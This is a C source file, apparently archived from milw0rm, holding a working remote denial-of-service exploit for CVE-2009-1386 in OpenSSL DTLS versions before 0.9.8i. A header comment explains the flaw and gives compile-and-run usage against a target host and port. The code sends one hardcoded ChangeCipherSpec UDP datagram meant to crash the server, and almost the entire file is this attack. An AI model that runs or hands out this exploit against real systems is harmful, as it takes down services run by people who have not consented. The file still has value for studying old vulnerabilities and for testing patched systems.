/* * cve-2009-1386.c * * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS * Jon Oberheide * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 * * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as * the first record instead of ClientHello. * * Usage: * * Pass the host and port of the target DTLS server: * * $ gcc cve-2009-1386.c -o cve-2009-1386 * $ ./cve-2009-1386 1.2.3.4 666 * * Notes: * * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this * only requires a single ChangeCipherSpec datagram, but affects an older * version of OpenSSL. * */ #include #include #include #include #include #include #include #include #include #include int main(int argc, char **argv) { int sock, ret; char *ptr, *err; struct hostent *h; struct sockaddr_in target; char buf[64]; if (argc < 3) { err = "Pass the host and port of the target DTLS server"; printf("[-] Error: %s\n", err); exit(1); } h = gethostbyname(argv[1]); if (!h) { err = "Unknown host specified"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); exit(1); } target.sin_family = h->h_addrtype; memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); target.sin_port = htons(atoi(argv[2])); sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock == -1) { err = "Failed creating UDP socket"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); exit(1); } ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); if (ret == -1) { err = "Failed to connect socket"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); exit(1); } memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14); printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]); send(sock, buf, 14, 0); close(sock); return 0; } // milw0rm.com [2009-06-04]